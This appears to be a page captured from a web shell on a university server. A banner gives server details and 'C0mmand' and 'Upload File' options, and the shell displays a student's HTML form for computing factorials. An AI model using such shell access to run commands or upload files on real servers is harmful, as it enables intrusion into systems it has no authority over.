Server IP : 172.16.15.8 / Your IP : 3.149.250.19 Web Server : Apache System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64 User : apache ( 48) PHP Version : 7.2.24 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/vgmiller/hello/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!-- Author: Valerie Miller Instructor: Dr. Wang File Name: CalFactForm.html Due Date: April 10, 2018 Goal: To create a clean form that allows a user to input a number n for the factorial calculation. --> <CENTER> <H2> Input a number <var>n</var> to calculate its factorial value</H2> <HR> <table style="border: 1px solid black; background-color:C6C6C6"> <tr> <td height="110" width="135"> <CENTER> <FORM action=CalFact.php method=post> Input <var>n</var>: <INPUT type=text size=5 name=num> <P> <HR> <P> <INPUT type=submit value="Submit"> <INPUT type=reset value="Clear"> </CENTER> </td> </tr> </tr> </table> <P> <A HREF="index.html"><INPUT type="button" value="Home"></A> </CENTER>